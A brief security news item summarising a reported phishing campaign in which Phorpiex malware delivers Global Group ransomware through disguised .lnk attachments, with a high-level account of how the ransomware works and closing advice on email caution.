Forcepoint X-Labs has uncovered a phishing campaign leveraging Phorpiex malware to distribute Global Group ransomware. This attack, ongoing through 2024 and 2025, often begins with an innocuous email titled “Your Document,” which tricks users into clicking on an attachment that appears harmless. The attachment uses a double extension, disguising a Windows shortcut file (.lnk) as a standard document. Once opened, it exploits legitimate Windows tools like PowerShell to execute commands that download the ransomware, which is hidden under names like windrv.exe. Global Group ransomware is particularly concerning because it operates in “mute” mode, meaning it encrypts files without needing to connect to an external server. This allows it to function even on offline computers. The encryption process uses the ChaCha20-Poly1305 algorithm, creating a robust barrier to file recovery without the criminal’s key. In addition, the malware is designed to erase its traces by deleting backups and its own files after executing its payload, making detection and recovery difficult. The campaign highlights the effectiveness of simple tactics in cyberattacks. Users are often caught off guard by seemingly mundane emails and attachments. The takeaway is clear: exercise caution with unsolicited emails, avoid clicking on links, and refrain from downloading attachments from unknown sources.